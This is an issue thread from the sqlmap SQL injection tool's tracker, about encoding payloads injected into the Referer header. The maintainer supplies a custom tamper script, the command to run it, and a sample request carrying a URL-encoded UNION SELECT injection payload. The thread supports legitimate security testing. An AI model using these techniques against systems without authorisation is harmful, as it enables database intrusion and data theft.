### ISSUE TITLE
Urlencode payload injected into headers

### ISSUE THREAD

**Issue by SecurityAddicted** [sqlmapproject/sqlmap#1466]
Hi everybody,
I'm trying to inject into the referer header, but sqlmap is not encoding the characters it injects, like ' (should become %27).
Is this an intended behavior?
Thanks.

**Comment by stamparm** [comment]
Header values should not be URL encoded. Can you please find me a reference to prove me otherwise.

**Comment by stamparm** [comment]
For example, you've probably never seen:

`Referer: http%3A%2F%2Fwww.google.com`

while this is the (value) URL encoded form of:

`Referer: http://www.google.com`

**Comment by SecurityAddicted** [comment]
Yeah you are right... Anyway I was working on an instance of sqli that use a parameter value from the url into the Referer field... and that value needed to be encoded.

**Comment by SecurityAddicted** [comment]
I tried to use the `charencode` tamper script but it encodes also the `http://www.example.com/?lang=` part...

**Comment by stamparm** [comment]
Create a custom tamper script named `tamper/custom.py` with the following content:

```
#!/usr/bin/env python

import urllib

from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    return urllib.quote(payload)
```

Run the sqlmap as follows:
python sqlmap.py -u http://127.0.0.1/ --referer="http://bla.com?id=1*" --tamper=custom

p.s. custom.py has to be either in `tamper` directory or you can put it anywhere you want (in which case you have to use a absolute path in `--tamper`)
p.p.s. sample request:

```
[15:50:35] [TRAFFIC OUT] HTTP request [#136]:
GET / HTTP/1.1
Accept-language: en-us,en;q=0.5
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: sqlmap/1.0-dev-e3ae026 (http://sqlmap.org)
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 127.0.0.1
Referer: http://bla.com?id=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20
Pragma: no-cache
Cache-control: no-cache,no-store
Connection: close
````
